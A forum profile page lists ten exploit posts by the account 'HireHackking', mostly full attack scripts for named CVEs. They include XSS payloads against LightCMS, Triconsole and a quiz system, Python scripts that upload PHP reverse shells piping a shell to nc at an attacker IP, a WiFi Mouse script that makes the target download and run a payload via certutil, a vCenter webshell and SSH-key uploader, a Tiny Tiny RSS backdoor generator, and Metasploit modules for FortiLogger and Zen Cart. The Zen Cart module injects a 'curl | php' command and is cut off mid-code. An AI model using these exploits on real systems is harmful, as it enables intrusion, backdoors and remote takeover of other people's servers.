Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    LightCMS 1.3.4 - 'exclusive' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS # Date: 25/02/2021 # Exploit Author: Peithon # Vendor Homepage: https://github.com/eddy8/LightCMS # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4 # Version: 1.3.4 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE: CVE-2021-3355 An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. --------------------------Proof of Concept----------------------- 1. Log in to the background. 2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value. Payload - </span><img src=1 onerror=alert(1) /><span> 3. Visit page `/admin/SensitiveWords`, the payload will be triggered.
  2. HireHackking

    Triconsole 3.75 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Triconsole 3.75 - Reflected XSS # Google Dork: inurl : /calendar/calendar_form.php # Date: 15/2/2021 # Exploit Author: Akash Chathoth # Vendor Homepage: http://www.triconsole.com/ # Software Link: http://www.triconsole.com/php/calendar_datepicker.php # Version: < 3.76 (14 February 2021) # Tested on: 3.75 # CVE: 2021-27330 # Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>
  3. HireHackking

    WiFi Mouse 1.7.8.5 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.7.8.5 # Tested on: Windows Enterprise Build 17763 # Desktop Server software used by mobile app has PIN option which does not to prevent command input. # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/python from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys import string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a".decode("hex"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
  4. HireHackking

    FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'FortiLogger Arbitrary File Upload Exploit', 'Description' => %q{ This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. }, 'License' => MSF_LICENSE, 'Author' => [ 'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module ], 'References' => [ ['CVE', '2021-3378'], ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] ], 'Platform' => ['win'], 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'FortiLogger - 4.4.2.2', { 'Platform' => 'win' } ], ], 'DisclosureDate' => '2021-02-26', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) ], self.class ) end def check_product_info res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), 'method' => 'POST', 'data' => '', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest' } ) return res end def check begin res = check_product_info if res && res.code == 200 if JSON.parse(res.body)['Version'] == '4.4.2.2' Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end end end def create_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end def exploit begin print_good('Generate Payload !') data = create_payload boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n" post_data << "Content-Type: image/png\r\n" post_data << "\r\n#{data}\r\n" post_data << "--#{boundary}\r\n" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data, 'headers' => { 'Accept' => 'application/json', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With' => 'XMLHttpRequest' } ) if res && res.code == 200 if JSON.parse(res.body)['Message'] == 'Error in saving file' print_error('Error for upload payload..') else print_good('Payload has been uploaded !') handler print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end end end end end
  5. HireHackking

    Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # #The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'id': '1337', 'menu':'PWN', 'cat': '1337', 'subcat':'PWN','desc':'PWN','price':'13.37', 'image': (random_file_name, revshell_string, 'application/x-php'),'update':''}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if "Successfully updated menu details!" in r1.text: print("(+) File upload seems to have been successful!") return random_file_name else: print("(-) Oh no, file upload seems to have failed.. quitting.") exit() def trigger_shell(target_ip, filename): url = 'http://{}/reservation/images/{}'.format(target_ip, filename) print("(+) Now trying to trigger our shell by requesting {} ..".format(url)) r2 = requests.get(url) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip, uploaded_filename) print("\n(+) done!") if __name__ == "__main__": main()
  6. HireHackking

    VMware vCenter Server 7.0 - Unauthenticated File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload # Date: 2021-02-27 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html # Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) # Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds # CVE: CVE-2021-21972 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-21972.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be CVE-2021-21972 is an unauthenticated file upload and overwrite, exploitation can be done via SSH public key upload or a webshell The webshell must be of type JSP, and its success depends heavily on the specific vCenter version # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister # A white page means vulnerable # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) # Notes: # * On Linux SSH key upload is always best, when SSH access is possible & enabled # * On Linux the upload is done as user vsphere-ui:users # * On Windows the upload is done as system user # * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui" # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: vulnerability checker + exploit ''' import os, tarfile, sys, optparse, requests requests.packages.urllib3.disable_warnings() lProxy = {} SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <env:Body> <RetrieveServiceContent xmlns="urn:vim25"> <_this type="ServiceInstance">ServiceInstance</_this> </RetrieveServiceContent> </env:Body> </env:Envelope>''' sURL = sFile = sRpath = sType = None def parseArguments(options): global sURL, sFile, sType, sRpath, lProxy if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') sURL = options.url if sURL[-1:] == '/': sURL = sURL[:-1] if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL sFile = options.file if not os.path.exists(sFile): exit('[-] File not found: ' + sFile) sType = 'ssh' if options.type: sType = options.type if options.rpath: sRpath = options.rpath else: sRpath = None if options.proxy: lProxy = {'https': options.proxy} def getVersion(sURL): def getValue(sResponse, sTag = 'vendor'): try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] except: pass return '' oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) #print(oResponse.text) if oResponse.status_code == 200: sResult = oResponse.text if not 'VMware' in getValue(sResult, 'vendor'): exit('[-] Not a VMware system: ' + sURL) else: sName = getValue(sResult, 'name') sVersion = getValue(sResult, 'version') # e.g. 7.0.0 sBuild = getValue(sResult, 'build') # e.g. 15934073 sFull = getValue(sResult, 'fullName') print('[+] Identified: ' + sFull) return sVersion, sBuild exit('[-] Not a VMware system: ' + sURL) def verify(sURL): #return True sURL += '/ui/vropspluginui/rest/services/uploadova' try: oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) except: exit('[-] System not available: ' + sURL) if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely else: return False def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): def getResourcePath(): oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) return oResponse.text.split('static/')[1].split('/')[0] oTar = tarfile.open('payloadLin.tar','w') if sRpath: ## version & build not important if sRpath[0] == '/': sRpath = sRpath[1:] sPayloadPath = '../../' + sRpath oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'absolute' elif sType.lower() == 'ssh': ## version & build not important sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'ssh' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) oTar.close() return 'webshell' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' def createTarWin(sFile, sRpath = None): ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows if sRpath: if sRpath[0] == '/': sRpath = sRpath[:1] sPayloadPath = '../../' + sRpath else: sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) oTar = tarfile.open('payloadWin.tar','w') oTar.add(sFile, arcname=sPayloadPath) oTar.close() def uploadFile(sURL, sUploadType, sFile): #print('[!] Uploading ' + sFile) sFile = os.path.basename(sFile) sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} ## Linux oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Linux payload uploaded succesfully.') if sUploadType == 'ssh': print('[+] SSH key installed for user \'vsphere-ui\'.') print(' Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'') return True elif sUploadType == 'webshell': sWebshell = sURL + '/ui/resources/' + sFile #print('testing ' + sWebshell) oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True elif sUploadType == 'backdoor': sWebshell = sURL + '/ui/resources/' + sFile print('[+] Backdoor ready, please reboot or wait for a reboot') print(' then open: ' + sWebshell) else: ## absolute pass ## Windows arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Windows payload uploaded succesfully.') if sUploadType == 'backdoor': print('[+] Absolute upload looks OK') return True else: sWebshell = sURL + '/statsreport/' + sFile oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True return False if __name__ == "__main__": usage = ( 'Usage: %prog [option]\n' 'Exploiting Windows & Linux vCenter Server\n' 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n' 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n' 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') parser = optparse.OptionParser(usage=usage) parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') (options, args) = parser.parse_args() parseArguments(options) ## Verify if verify(sURL): print('[+] Target vulnerable: ' + sURL) else: exit('[-] Target not vulnerable: ' + sURL) ## Read out the version sVersion, sBuild = getVersion(sURL) if sRpath: print('[!] Ready to upload your file to ' + sRpath) elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'') else: print('[!] Ready to upload webshell \'' + sFile + '\'') sAns = input('[?] Want to exploit? [y/N]: ') if not sAns or not sAns[0].lower() == 'y': exit() ## Create TAR file sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) if not sUploadType == 'ssh': createTarWin(sFile, sRpath) ## Upload and verify uploadFile(sURL, sUploadType, sFile) ## Cleanup os.remove('payloadLin.tar') os.remove('payloadWin.tar')
  7. HireHackking

    Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated) # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if r1.text == '1': print("(+) File upload seems to have been successful!") return None else: print("(-) Oh no, the file upload seems to have failed!") exit() def trigger_shell(target_ip): print("(+) Now trying to trigger our shell..") #The file we uploaded previously is expected to be an image that the web app tries to embed into the login page. #So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name. r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip)) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip) print("\n(+) done!") if __name__ == "__main__": main()
  8. HireHackking

    Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: Praharsh Kumar Singh # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Vulnerability Type: Cross-site Scripting # Vulnerability: Persistent/Stored XSS # Tested on: Parrot OS # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in adding questions in options parameter affected from this vulnerability. # payload: </script><script >alert(document.cookie)</script> POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1 Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh Upgrade-Insecure-Requests: 1 Sec-GPC: 1 qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c POC: # go to url http://localhost:8080/admin.php # login and add question # then put the above payload in MCQ options parameter # then fill the remaining details # then click add # go to url http://localhost:8080/login.php # then login to user account # then attempt the quiz while attempting the quiz xss pop up there..!
  9. HireHackking

    Tiny Tiny RSS - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tiny Tiny RSS - Remote Code Execution # Date: 21/09/2020 # Exploit Author: Daniel Neagaru & Benjamin Nadarević # Blog post: https://www.digeex.de/blog/tinytinyrss/ # Software Link: https://git.tt-rss.org/fox/tt-rss # Version: all before 2020-09-16 # Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef # Tested on: default docker installation method # CVE : CVE-2020-25787 #!/usr/bin/env python3 from sys import argv import urllib.parse as ul import base64 def CustomFcgi( filename, output, backdoor): length=len(output)+len(backdoor)+64 char=chr(length) data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" temp1 = chr(len(data) // 256) temp2 = chr(len(data) % 256) temp3 = chr(len(data) % 8) end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00" start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" payload = start + data + end def get_payload(payload): finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") return finalpayload return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) TTRSS_PATH = "/var/www/html/tt-rss/" BACKDOOR_CODE = """ <?php echo "success\n"; echo system($_GET['cmd']); ?> """ feed_file = open("malicious_RCE_feed.xml",'w') filename = TTRSS_PATH + "config.php" output = TTRSS_PATH + "backdoor.php" backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" feed ="""<?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Exploit demo - rce</title> <link></link> <description>You are getting infected :(</description> <item> <title> Check if there is backdoor.php</title> <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link> <description> <![CDATA[ Dummy text <img src="{}"> ]]> </description> </item> </channel> </rss> """.format(rce) feed_file.write(feed) feed_file.close()
  10. HireHackking

    Zen Cart 1.5.7b - Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ### # # # This exploit write payload in database and trig to command # a bug in an zencart v1.5.7b web application # ### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'zencart authenticated remote code execution exploit', 'Description' => %q( This exploit module execution os command in zencart. ), 'License' => MSF_LICENSE, 'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc 'References' =>[ [ 'OSVDB', '' ], [ 'EDB', '' ], [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'], [ 'CVE', '2021-3291'] ], 'Platform' => 'php', 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => '2021-01-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ true, 'Password to login with', '']), OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']), OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']), OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']), OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/']) ], self.class ) end def start_server ssltut = false if datastore["SSL"] ssltut = true datastore["SSL"] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("payload is on #{get_uri}") @adresim = get_uri datastore['SSL'] = true if ssltut end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') send_response(cli, payload.encoded, {'Content-Type'=>'text/html'}) end def tabanyol datastore["BASEPATH"] end def isim datastore["USERNAME"] end def parola datastore["PASSWORD"] end def login #"index.php?cmd=login&camefrom=index.php" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'login', 'camefrom' => 'index.php' }) # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" /> unless res fail_with(Failure::Unreachable, "Access web application failure") end if res.code != 200 fail_with(Failure::Unreachable, "we not have 200 response") end if !res.get_cookies.empty? @cookie = res.get_cookies @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @csrftoken.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end vprint_good("login Csrf token: "+@csrftoken) end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"), 'cookie' => @cookie, 'vars_post' => { 'securityToken' => @csrftoken, 'action' => "do"+@csrftoken, 'admin_name' => isim, 'admin_pass' => parola }) if res.code != 302 fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.') end true end def check unless login fail_with(Failure::UnexpectedReply, 'Wrong credentials') return CheckCode::NotVulnerable('Wrong credentials') end print_good("We loged in") Exploit::CheckCode::Vulnerable CheckCode::Vulnerable('Authenticated successfully') end def exploit check start_server sleep(4) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) if res.code != 200 fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200') end # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" /> if res && res.code == 200 @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @formtoken.empty? fail_with(Failure::UnexpectedReply, 'securitytoken not in response') end #print_good(@formtoken) # <form name="modules" @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/) @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/) @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/) @secme = {} @secme["securityToken"] = @formtoken for @a in @radiolar @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //" end for @a 